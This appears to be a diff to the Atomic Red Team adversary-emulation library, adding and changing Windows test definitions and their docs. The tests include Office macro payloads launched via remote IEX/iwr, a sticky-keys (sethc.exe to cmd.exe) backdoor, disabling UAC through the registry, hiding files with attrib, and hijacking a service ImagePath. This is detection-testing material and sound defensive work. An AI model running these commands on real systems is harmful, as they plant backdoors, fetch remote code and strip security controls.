 - name: OSTap Payload Download
  auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -79,31 +81,33 @@ atomic_tests:
      type: String
      default: Word
    ms_office_version:
-      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version.
      type: String
-      default: "16.0"
+      default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
    prereq_command: |
-      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+      $ms_office_version = #{ms_office_version}
+      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
    get_prereq_command: |
      $msword = New-Object -ComObject word.application
      Stop-Process -Name WINWORD
  executor:
    command: |
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      $ms_office_version = #{ms_office_version}
      $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-      Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+      Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
    cleanup_command: |
-      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+      $ms_office_version = #{ms_office_version}
+      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
    name: powershell
 - name: OSTAP JS version
  auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
  description: |
    Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
  supported_platforms:
  - windows
@@ -117,25 +121,67 @@ atomic_tests:
      type: String
      default: Word
    ms_office_version:
-      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version.
      type: String
-      default: "16.0"
+      default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
    prereq_command: |
-      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+      $ms_office_version = #{ms_office_version}
+      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
    get_prereq_command: |
      $msword = New-Object -ComObject word.application
      Stop-Process -Name WINWORD
  executor:
    command: |
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      $ms_office_version = #{ms_office_version}
      $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-      Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+      Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
    cleanup_command: |
+      $ms_office_version = #{ms_office_version}
      if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
    name: powershell

+- name: Office launching .bat file from AppData
+  description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
+  supported_platforms:
+  - windows
+  input_arguments:
+    bat_path:
+      description: Path to malicious .bat file
+      type: String
+      default: $env:temp+"\art1204.bat"
+    ms_office_version:
+      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version.
+      type: string
+      default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]
+    ms_product:
+      description: Maldoc application Word or Excel
+      type: String
+      default: Word
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+    prereq_command: |
+      $ms_office_version = #{ms_office_version}
+      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      $msword = New-Object -ComObject word.application
+      Stop-Process -Name WINWORD
+  executor:
+    command: |
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      $ms_office_version = #{ms_office_version}
+      $bat_path = #{bat_path}
+      $macrocode = "   Open `"$bat_path`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+      Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+    cleanup_command: |
+      $ms_office_version = #{ms_office_version}
+      if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+    name: powershell
@@ -194,7 +194,7 @@ Emulates attack via documents through protocol handler in Microsoft Office.  On


 ```cmd
-#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
+"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 ```


@@ -122,4 +122,4 @@ atomic_tests:
    name: command_prompt
    elevation_required: false
    command: |
-      #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
+      "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
@@ -14,7 +14,9 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as

 - [Atomic Test #3 - attrib - Remove read-only attribute](#atomic-test-3---attrib---remove-read-only-attribute)

- [Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-4---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style)
+- [Atomic Test #4 - attrib - hide file](#atomic-test-4---attrib---hide-file)
+
+- [Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-5---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style)


 <br/>
@@ -155,7 +157,59 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
 <br/>
 <br/>

-## Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style
+## Atomic Test #4 - attrib - hide file
+Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that
+the victim does not see the file.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_or_folder | Path of the file or folder remove attribute. | path | %temp%&#92;T1222.001_attrib_2|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
+attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
+```
+
+#### Cleanup Commands:
+```cmd
+attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt
+attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt
+del #{file_or_folder}\T1222.001_attrib*.txt
+rmdir #{file_or_folder}
+```
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Test requires a file to modify to be located at (#{file_or_folder})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+```
+##### Get Prereq Commands:
+```cmd
+mkdir #{file_or_folder}
+echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
+echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style
 Invokes the command line used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone.

 **Supported Platforms:** Windows
@@ -20,6 +20,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

 - [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes)

+- [Atomic Test #2 - Replace binary of sticky keys](#atomic-test-2---replace-binary-of-sticky-keys)
+

 <br/>

@@ -47,7 +49,7 @@ Upon successful execution, powershell will modify the registry and swap osk.exe
 $input_table = "#{parent_list}".split(",")
 $Name = "Debugger"
 $Value = "#{attached_process}"
-Foreach ($item in $input_table){   
+Foreach ($item in $input_table){
  $item = $item.trim()
  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
  IF(!(Test-Path $registryPath))
@@ -76,4 +78,35 @@ Foreach ($item in $input_table)



+<br/>
+<br/>
+
+## Atomic Test #2 - Replace binary of sticky keys
+Replace sticky keys binary (sethc.exe) with cmd.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+takeown /F C:\Windows\System32\sethc.exe /A
+icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+```
+
+
+
+
+
 <br/>
@@ -25,7 +25,7 @@ atomic_tests:
      $input_table = "#{parent_list}".split(",")
      $Name = "Debugger"
      $Value = "#{attached_process}"
-      Foreach ($item in $input_table){   
+      Foreach ($item in $input_table){
        $item = $item.trim()
        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
        IF(!(Test-Path $registryPath))
@@ -47,4 +47,19 @@ atomic_tests:
      }
    name: powershell
    elevation_required: true
-
+- name: Replace binary of sticky keys
+  auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+  description: |
+    Replace sticky keys binary (sethc.exe) with cmd.exe
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+      takeown /F C:\Windows\System32\sethc.exe /A
+      icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+    name: command_prompt
+    elevation_required: true
@@ -26,6 +26,8 @@ Another bypass is possible through some lateral movement techniques if credentia

 - [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)

+- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)
+

 <br/>

@@ -248,7 +250,7 @@ del "c:\testbypass.exe" >nul 2>nul
 <br/>

 ## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
-Bypasses User Account Control using a fileless method, registry only. 
+Bypasses User Account Control using a fileless method, registry only.
 Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
 [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
 Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
@@ -283,4 +285,33 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I



+<br/>
+<br/>
+
+## Atomic Test #8 - Disable UAC using reg.exe
+Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
+HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
 <br/>
@@ -128,7 +128,7 @@ atomic_tests:
 - name: Bypass UAC using sdclt DelegateExecute
  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
  description: |
-    Bypasses User Account Control using a fileless method, registry only. 
+    Bypasses User Account Control using a fileless method, registry only.
    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
@@ -147,4 +147,18 @@ atomic_tests:
      Start-Sleep -s 3
    cleanup_command: |
      Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
-    name: powershell
+    name: powershell
+- name: Disable UAC using reg.exe
+  auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+  description: |
+    Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
+    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
+    name: command_prompt
+    elevation_required: true
@@ -10,11 +10,13 @@ Adversaries may also alter Registry keys associated with service failure paramet

 - [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness)

+- [Atomic Test #2 - Service ImagePath Change with reg.exe](#atomic-test-2---service-imagepath-change-with-regexe)
+

 <br/>

 ## Atomic Test #1 - Service Registry Permissions Weakness
-Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
+Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
 reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"

 **Supported Platforms:** Windows
@@ -41,4 +43,51 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F



+<br/>
+<br/>
+
+## Atomic Test #2 - Service ImagePath Change with reg.exe
+Change Service registry ImagePath of a bengin service to a malicious file
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| weak_service_name | weak service name | String | calcservice|
+| weak_service_path | weak service path | String | %windir%&#92;system32&#92;win32calc.exe|
+| malicious_service_path | malicious service path | String | %windir%&#92;system32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+```
+
+#### Cleanup Commands:
+```cmd
+sc.exe delete #{weak_service_name}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The service must exist (#{weak_service_name})
+##### Check Prereq Commands:
+```powershell
+if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+```
+
+
+
+
 <br/>
@@ -4,7 +4,7 @@ atomic_tests:
 - name: Service Registry Permissions Weakness
  auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
  description: |
-    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
+    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
  supported_platforms:
  - windows
@@ -17,4 +17,37 @@ atomic_tests:
    command: |
      get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
      get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
-    name: powershell
+    name: powershell
+- name: Service ImagePath Change with reg.exe
+  auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+  description: |
+    Change Service registry ImagePath of a bengin service to a malicious file
+  supported_platforms:
+  - windows
+  input_arguments:
+    weak_service_name:
+      description: weak service name
+      type: String
+      default: calcservice
+    weak_service_path:
+      description: weak service path
+      type: String
+      default: '%windir%\system32\win32calc.exe'
+    malicious_service_path:
+      description: malicious service path
+      type: String
+      default: '%windir%\system32\cmd.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The service must exist (#{weak_service_name})
+    prereq_command: |
+      if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+  executor:
+    command: |
+      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+    cleanup_command: |
+      sc.exe delete #{weak_service_name}
+    name: command_prompt
@@ -614,3 +614,12 @@ d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
 f3a6cceb-06c9-48e5-8df8-8867a6814245
 c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
+121de5c6-5818-4868-b8a7-8fd07c455c1b
+2d943c18-e74a-44bf-936f-25ade6cccab4
+4c8db261-a58b-42a6-a866-0a294deedde4
+32b979da-7b68-42c9-9a99-0e39900fc36c
+934e90cf-29ca-48b3-863c-411737ad44e3
+9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+f38e9eea-e1d7-4ba6-b716-584791963827
+3723ab77-c546-403c-8fb4-bb577033b235
+60e860b6-8ae6-49db-ad07-5e73edd88f5d